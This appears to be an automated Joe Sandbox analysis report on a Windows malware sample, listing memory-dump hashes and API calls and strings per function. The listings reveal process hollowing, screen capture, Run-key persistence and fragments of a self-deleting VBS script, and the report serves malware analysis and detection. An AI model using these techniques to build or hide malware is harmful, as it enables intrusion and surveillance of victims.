                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                              • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                              • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                              • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                              • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                              • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                              • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                              • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                              • Opcode Fuzzy Hash: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                              • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                              • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                              • Opcode Fuzzy Hash: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                              • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                              • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                              • Opcode Fuzzy Hash: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                              • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                              • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                              • Opcode Fuzzy Hash: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                              • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                              • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                              • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                              • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                              • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                              • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                              • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                              • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                              • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                              • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                              Yara matches
                              • Opcode ID: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                              • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                              • Opcode Fuzzy Hash: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                              • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                              Yara matches
                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                              • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                              • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                              • DeleteDC.GDI32(?), ref: 0041805D
                              • DeleteDC.GDI32(00000000), ref: 00418060
                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                              • GetCursorInfo.USER32(?), ref: 004180B5
                              • GetIconInfo.USER32(?,?), ref: 004180CB
                              • DeleteObject.GDI32(?), ref: 004180FA
                              • DeleteObject.GDI32(?), ref: 00418107
                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                              • DeleteDC.GDI32(?), ref: 0041827F
                              • DeleteDC.GDI32(00000000), ref: 00418282
                              • DeleteObject.GDI32(00000000), ref: 00418285
                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                              • DeleteObject.GDI32(00000000), ref: 00418344
                              • GlobalFree.KERNEL32(?), ref: 0041834B
                              • DeleteDC.GDI32(?), ref: 0041835B
                              • DeleteDC.GDI32(00000000), ref: 00418366
                              • DeleteDC.GDI32(?), ref: 00418398
                              • DeleteDC.GDI32(00000000), ref: 0041839B
                              • DeleteObject.GDI32(?), ref: 004183A1
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                              • String ID: DISPLAY
                              • API String ID: 1352755160-865373369
                              • Opcode ID: 65031f97ef394c283d608ce2a3b86648804c09f767b6eb0c59d0cb103e9b2b84
                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                              • Opcode Fuzzy Hash: 65031f97ef394c283d608ce2a3b86648804c09f767b6eb0c59d0cb103e9b2b84
                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                              • ResumeThread.KERNEL32(?), ref: 00417582
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                              • GetLastError.KERNEL32 ref: 004175C7
                              Yara matches
                              Similarity
                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                              • API String ID: 4188446516-108836778
                              • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                              • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                              APIs
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                              • ExitProcess.KERNEL32 ref: 0041151D
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                              • API String ID: 4250697656-2665858469
                              • Opcode ID: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                              • Opcode Fuzzy Hash: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                              • ExitProcess.KERNEL32 ref: 0040C63E
                              Yara matches
                              Similarity
                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 1861856835-3168347843
                              • Opcode ID: f51bfa6b7c3f9999a45a680355c5bd22f20670f2917b1e3679d0a1efb1c896c2
                              • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                              • Opcode Fuzzy Hash: f51bfa6b7c3f9999a45a680355c5bd22f20670f2917b1e3679d0a1efb1c896c2
                              • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                              • SetEvent.KERNEL32 ref: 0041A38A
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                              • CloseHandle.KERNEL32 ref: 0041A3AB
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                              • API String ID: 738084811-2745919808
                              • Opcode ID: 5b8ca1bb064d8b9a1923521c05ecac3758fe9787d692b5992abcb03318a6c91e
                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                              • Opcode Fuzzy Hash: 5b8ca1bb064d8b9a1923521c05ecac3758fe9787d692b5992abcb03318a6c91e
                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                              • ExitProcess.KERNEL32 ref: 0040C287
                              Yara matches
                              Similarity
                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                              • API String ID: 3797177996-1998216422
                              • Opcode ID: 6bcc088d61530c7c680840eab27c4b5acbfb500225eb43698b3115ac788db025
